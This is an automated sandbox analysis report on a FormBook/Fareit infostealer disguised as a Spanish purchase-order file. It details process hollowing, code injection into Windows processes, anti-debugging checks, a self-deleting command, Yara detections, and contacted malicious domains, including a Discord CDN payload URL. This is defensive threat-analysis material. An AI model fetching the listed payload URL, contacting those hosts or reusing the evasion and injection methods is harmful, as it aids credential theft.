Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A7794 mov eax, dword ptr fs:[00000030h]	12_2_048A7794
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A7794 mov eax, dword ptr fs:[00000030h]	12_2_048A7794
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048637F5 mov eax, dword ptr fs:[00000030h]	12_2_048637F5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F070D mov eax, dword ptr fs:[00000030h]	12_2_048F070D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F070D mov eax, dword ptr fs:[00000030h]	12_2_048F070D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485A70E mov eax, dword ptr fs:[00000030h]	12_2_0485A70E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485A70E mov eax, dword ptr fs:[00000030h]	12_2_0485A70E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0484F716 mov eax, dword ptr fs:[00000030h]	12_2_0484F716
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048BFF10 mov eax, dword ptr fs:[00000030h]	12_2_048BFF10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048BFF10 mov eax, dword ptr fs:[00000030h]	12_2_048BFF10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04824F2E mov eax, dword ptr fs:[00000030h]	12_2_04824F2E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04824F2E mov eax, dword ptr fs:[00000030h]	12_2_04824F2E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485E730 mov eax, dword ptr fs:[00000030h]	12_2_0485E730
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0484B73D mov eax, dword ptr fs:[00000030h]	12_2_0484B73D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0484B73D mov eax, dword ptr fs:[00000030h]	12_2_0484B73D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0483EF40 mov eax, dword ptr fs:[00000030h]	12_2_0483EF40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0483FF60 mov eax, dword ptr fs:[00000030h]	12_2_0483FF60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048F8F6A mov eax, dword ptr fs:[00000030h]	12_2_048F8F6A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_04829080 mov eax, dword ptr fs:[00000030h]	12_2_04829080
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A3884 mov eax, dword ptr fs:[00000030h]	12_2_048A3884
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048A3884 mov eax, dword ptr fs:[00000030h]	12_2_048A3884
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048520A0 mov eax, dword ptr fs:[00000030h]	12_2_048520A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048520A0 mov eax, dword ptr fs:[00000030h]	12_2_048520A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048520A0 mov eax, dword ptr fs:[00000030h]	12_2_048520A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048520A0 mov eax, dword ptr fs:[00000030h]	12_2_048520A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048520A0 mov eax, dword ptr fs:[00000030h]	12_2_048520A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048520A0 mov eax, dword ptr fs:[00000030h]	12_2_048520A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048690AF mov eax, dword ptr fs:[00000030h]	12_2_048690AF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485F0BF mov ecx, dword ptr fs:[00000030h]	12_2_0485F0BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485F0BF mov eax, dword ptr fs:[00000030h]	12_2_0485F0BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0485F0BF mov eax, dword ptr fs:[00000030h]	12_2_0485F0BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048BB8D0 mov eax, dword ptr fs:[00000030h]	12_2_048BB8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048BB8D0 mov ecx, dword ptr fs:[00000030h]	12_2_048BB8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048BB8D0 mov eax, dword ptr fs:[00000030h]	12_2_048BB8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048BB8D0 mov eax, dword ptr fs:[00000030h]	12_2_048BB8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048BB8D0 mov eax, dword ptr fs:[00000030h]	12_2_048BB8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048BB8D0 mov eax, dword ptr fs:[00000030h]	12_2_048BB8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0484B8E4 mov eax, dword ptr fs:[00000030h]	12_2_0484B8E4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_0484B8E4 mov eax, dword ptr fs:[00000030h]	12_2_0484B8E4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048240E1 mov eax, dword ptr fs:[00000030h]	12_2_048240E1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048240E1 mov eax, dword ptr fs:[00000030h]	12_2_048240E1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 12_2_048240E1 mov eax, dword ptr fs:[00000030h]	12_2_048240E1

Source: C:\Windows\SysWOW64\mobsync.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 5_2_04A895D0 NtClose,LdrInitializeThunk,

5_2_04A895D0

HIPS / PFW / Operating System Protection Evasion:

Sample uses process hollowing technique

Show sources

Source: C:\Windows\SysWOW64\mobsync.exe

Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: EF0000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: unknown protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 72480000	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: AB0000	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: AC0000	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 9C0000	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 9D0000	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 72480000	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: D60000	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: D70000	Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 72480000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: AB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: AC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 72480000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 9C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 9D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 72480000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: D60000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: D70000 protect: page execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 72480000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 72480000 value starts with: 4D5A	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Windows\SysWOW64\mobsync.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\SysWOW64\mobsync.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Thread register set: target process: 3424			Jump to behavior

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: AC0000	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 9D0000	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: D70000	Jump to behavior

Source: C:\Users\user\Desktop\Se adjunta el pedido, proforma.exe	Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe	Jump to behavior
Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\mobsync.exe"	Jump to behavior

Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.mobsync.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mobsync.exe.72480000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.726500145.000000000E234000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.783906150.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.700205465.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.797142151.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.797529980.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.783440695.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.797983718.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.782555506.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.946259387.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.782971513.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.802925802.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.700532908.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.775386122.0000000000C50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.700902769.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.775973432.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.804512443.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.701236114.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.796733965.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.752416776.000000000E234000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.946446675.0000000000BF0000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.mobsync.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mobsync.exe.72480000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.726500145.000000000E234000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.783906150.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.700205465.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.797142151.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.797529980.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.783440695.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.797983718.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.782555506.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.946259387.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.782971513.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.802925802.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.700532908.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.775386122.0000000000C50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.700902769.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.775973432.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.804512443.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.701236114.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.796733965.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.752416776.000000000E234000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.946446675.0000000000BF0000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Registry Run Keys / Startup Folder1	Process Injection811	Masquerading11	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder1	Virtualization/Sandbox Evasion2	LSASS Memory	Security Software Discovery23	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection811	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information3	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery12	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Se adjunta el pedido, proforma.exe	43%	Virustotal		Browse
Se adjunta el pedido, proforma.exe	50%	ReversingLabs	Win32.Infostealer.Fareit

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe	50%	ReversingLabs	Win32.Infostealer.Fareit

Unpacked PE Files

Source	Detection	Scanner	Label	Download
18.2.mobsync.exe.72480000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
15.0.logagent.exe.72480000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
5.0.mobsync.exe.72480000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
15.0.logagent.exe.72480000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
5.2.mobsync.exe.72480000.4.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
5.0.mobsync.exe.72480000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
18.0.mobsync.exe.72480000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
5.0.mobsync.exe.72480000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
15.2.logagent.exe.72480000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
15.0.logagent.exe.72480000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
5.0.mobsync.exe.72480000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
18.0.mobsync.exe.72480000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
15.0.logagent.exe.72480000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
18.0.mobsync.exe.72480000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
18.0.mobsync.exe.72480000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
www.rematedeldia.com/euv4/	0%	Avira URL Cloud	safe
http://crl.microsoft	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.pkem.top	104.233.161.196	true	true	unknown
cdn.discordapp.com	162.159.134.233	true	false	high
www.77777.store	103.120.80.111	true	false	unknown
hagenbicycles.com	85.194.202.138	true	true	unknown
www.tajniezdrzi.quest	37.123.118.150	true	false	unknown
www.hagenbicycles.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.rematedeldia.com/euv4/	true	Avira URL Cloud: safe	low
https://cdn.discordapp.com/attachments/900622540588843013/912979191073476678/Lxtcsmegwxhfqoabkjaduxyckamobho	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://cdn.discordapp.com/	Se adjunta el pedido, proforma.exe, 00000000.00000003.667080485.00000000006F9000.00000004.00000001.sdmp	false		high
http://crl.microsoft	Se adjunta el pedido, proforma.exe, 00000000.00000003.665782531.00000000006F9000.00000004.00000001.sdmp, Se adjunta el pedido, proforma.exe, 00000000.00000003.667080485.00000000006F9000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://cdn.discordapp.com/attachments/900622540588843013/912979191073476678/Lxtcsmegwxhfqoabkjaduxy	Se adjunta el pedido, proforma.exe, 00000000.00000003.667080485.00000000006F9000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
162.159.130.233	unknown	United States	13335	CLOUDFLARENETUS	false
162.159.135.233	unknown	United States	13335	CLOUDFLARENETUS	false
162.159.134.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528688
Start date:	25.11.2021
Start time:	16:50:23
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Se adjunta el pedido, proforma.exe
Cookbook file name:	default.jbs
